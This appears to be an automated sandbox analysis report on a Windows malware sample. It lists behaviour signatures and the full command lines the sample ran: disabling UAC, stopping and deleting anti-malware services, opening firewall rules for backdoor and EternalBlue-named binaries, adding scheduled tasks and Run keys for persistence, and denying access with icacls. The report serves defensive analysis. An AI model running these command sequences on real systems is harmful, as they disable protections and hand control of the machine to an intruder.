Analysis Overview
SHA256
dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360
Threat Level: Known bad
The file dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360 was found to be: Known bad.
Malicious Activity Summary
Modifies visiblity of hidden/system files in Explorer
UAC bypass
Windows security bypass
RMS
Modifies Windows Defender Real-time Protection settings
Azorult
ACProtect 1.3x - 1.4x DLL software
Grants admin privileges
ASPack v2.12-2.42
Blocks application from running via registry modification
Stops running service(s)
Sets DLL path for service in the registry
UPX packed file
Sets file to hidden
Drops file in Drivers directory
Executes dropped EXE
Modifies Windows Firewall
Modifies file permissions
Checks computer location settings
Loads dropped DLL
Adds Run key to start application
Modifies WinLogon
Looks up external IP address via web service
Checks whether UAC is enabled
Legitimate hosting services abused for malware hosting/C2
AutoIT Executable
Drops file in System32 directory
Drops file in Program Files directory
Launches sc.exe
Enumerates physical storage devices
Runs net.exe
Modifies registry class
Suspicious use of SetWindowsHookEx
Checks processor information in registry
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Gathers network information
System policy modification
Views/modifies file attributes
Suspicious behavior: LoadsDriver
Runs .reg file with regedit
Creates scheduled task(s)
Delays execution with timeout.exe
Kills process with taskkill
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: SetClipboardViewer
Suspicious behavior: EnumeratesProcesses
NTFS ADS
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-05-16 19:23
Signatures
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2022-05-16 19:23
Reported
2022-05-16 19:32
Platform
win7-20220414-en
Max time kernel
155s
Max time network
158s
Command Line
Signatures
Azorult
Modifies Windows Defender Real-time Protection settings
Modifies visiblity of hidden/system files in Explorer
RMS
UAC bypass
Windows security bypass
ACProtect 1.3x - 1.4x DLL software
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Grants admin privileges
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocks application from running via registry modification
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe | N/A |
Executes dropped EXE
Modifies Windows Firewall
Sets DLL path for service in the registry
Sets file to hidden
Stops running service(s)
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Loads dropped DLL
Modifies file permissions
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | C:\Programdata\RealtekHD\taskhostw.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" | C:\Programdata\RealtekHD\taskhostw.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Modifies WinLogon
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" | C:\rdp\RDPWInst.exe | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Program Files directory
Launches sc.exe
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2 | C:\Programdata\RealtekHD\taskhostw.exe | N/A |
Runs .reg file with regedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\regedit.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\regedit.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: SetClipboardViewer
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\rdp\RDPWInst.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| N/A | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| N/A | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
| N/A | N/A | C:\ProgramData\Windows\rutserv.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System | C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe | N/A |
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe
"C:\Users\Admin\AppData\Local\Temp\dd396a3f66ad728660023cb116235f3cb1c35d679a155b08ec6a9ccaf966c360.exe"
C:\ProgramData\Microsoft\Intel\wini.exe
C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
C:\programdata\install\cheat.exe
C:\programdata\install\cheat.exe -pnaxui
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
C:\ProgramData\Windows\winit.exe
"C:\ProgramData\Windows\winit.exe"
C:\ProgramData\Microsoft\Intel\taskhost.exe
"C:\ProgramData\Microsoft\Intel\taskhost.exe"
C:\programdata\install\ink.exe
C:\programdata\install\ink.exe
C:\programdata\microsoft\intel\P.exe
C:\programdata\microsoft\intel\P.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc start appidsvc
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc start appmgmt
C:\Windows\SysWOW64\sc.exe
sc start appidsvc
C:\Windows\SysWOW64\sc.exe
sc start appmgmt
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Programdata\Windows\install.bat" "
C:\Windows\SysWOW64\regedit.exe
regedit /s "reg1.reg"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
C:\Windows\SysWOW64\sc.exe
sc config appidsvc start= auto
C:\Windows\SysWOW64\regedit.exe
regedit /s "reg2.reg"
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
C:\Windows\SysWOW64\sc.exe
sc config appmgmt start= auto
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete swprv
C:\Windows\SysWOW64\sc.exe
sc delete swprv
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop mbamservice
C:\Windows\SysWOW64\sc.exe
sc stop mbamservice
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
C:\Windows\SysWOW64\sc.exe
sc stop bytefenceservice
C:\ProgramData\Windows\rutserv.exe
rutserv.exe /silentinstall
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
C:\Windows\SysWOW64\sc.exe
sc delete bytefenceservice
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete mbamservice
C:\Windows\SysWOW64\sc.exe
sc delete mbamservice
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete crmsvc
C:\Windows\SysWOW64\sc.exe
sc delete crmsvc
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete "windows node"
C:\ProgramData\Windows\rutserv.exe
rutserv.exe /firewall
C:\Windows\SysWOW64\sc.exe
sc delete "windows node"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer
C:\Windows\SysWOW64\sc.exe
sc stop Adobeflashplayer
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop MoonTitle
C:\Windows\SysWOW64\sc.exe
sc delete AdobeFlashPlayer
C:\Windows\SysWOW64\sc.exe
sc stop MoonTitle
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete MoonTitle"
C:\Windows\SysWOW64\sc.exe
sc delete MoonTitle"
C:\ProgramData\Windows\rutserv.exe
C:\ProgramData\Windows\rutserv.exe
C:\ProgramData\Windows\rutserv.exe
rutserv.exe /start
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop AudioServer
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete AudioServer"
C:\Windows\SysWOW64\sc.exe
sc stop AudioServer
C:\Windows\SysWOW64\sc.exe
sc delete AudioServer"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64
C:\Windows\SysWOW64\sc.exe
sc stop clr_optimization_v4.0.30318_64
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"
C:\Windows\SysWOW64\sc.exe
sc delete clr_optimization_v4.0.30318_64"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql
C:\Windows\SysWOW64\sc.exe
sc stop MicrosoftMysql
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set allprofiles state on
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
C:\Windows\SysWOW64\sc.exe
sc delete MicrosoftMysql
C:\programdata\microsoft\intel\R8.exe
C:\programdata\microsoft\intel\R8.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\rdp\pause.bat" "
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
C:\ProgramData\Microsoft\Intel\winlog.exe
C:\ProgramData\Microsoft\Intel\winlog.exe -p123
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
C:\ProgramData\Microsoft\Intel\winlogon.exe
"C:\ProgramData\Microsoft\Intel\winlogon.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FF94.tmp\FF95.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"
C:\ProgramData\Windows\rfusclient.exe
C:\ProgramData\Windows\rfusclient.exe
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
C:\ProgramData\Windows\rfusclient.exe
C:\ProgramData\Windows\rfusclient.exe /tray
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows\*.*
C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows
C:\Windows\SysWOW64\sc.exe
sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
C:\Windows\SysWOW64\sc.exe
sc config RManService obj= LocalSystem type= interact type= own
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
C:\Windows\SysWOW64\sc.exe
sc config RManService DisplayName= "Microsoft Framework"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\programdata\microsoft\temp\H.bat
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
C:\Programdata\WindowsTask\winlogon.exe
C:\Programdata\WindowsTask\winlogon.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C schtasks /query /fo list
C:\Windows\SysWOW64\schtasks.exe
schtasks /query /fo list
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\programdata\microsoft\temp\Temp.bat
C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 5 /NOBREAK
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\rdp\Rar.exe
"Rar.exe" e -p555 db.rar
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Rar.exe
C:\Windows\system32\taskeng.exe
taskeng.exe {8D3E92CE-8DF4-42AF-AC47-B2C46AFF42DA} S-1-5-21-790309383-526510583-3802439154-1000:TVHJCWMH\Admin:Interactive:[1]
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\ProgramData\Windows\rfusclient.exe
C:\ProgramData\Windows\rfusclient.exe /tray
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ipconfig /flushdns
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
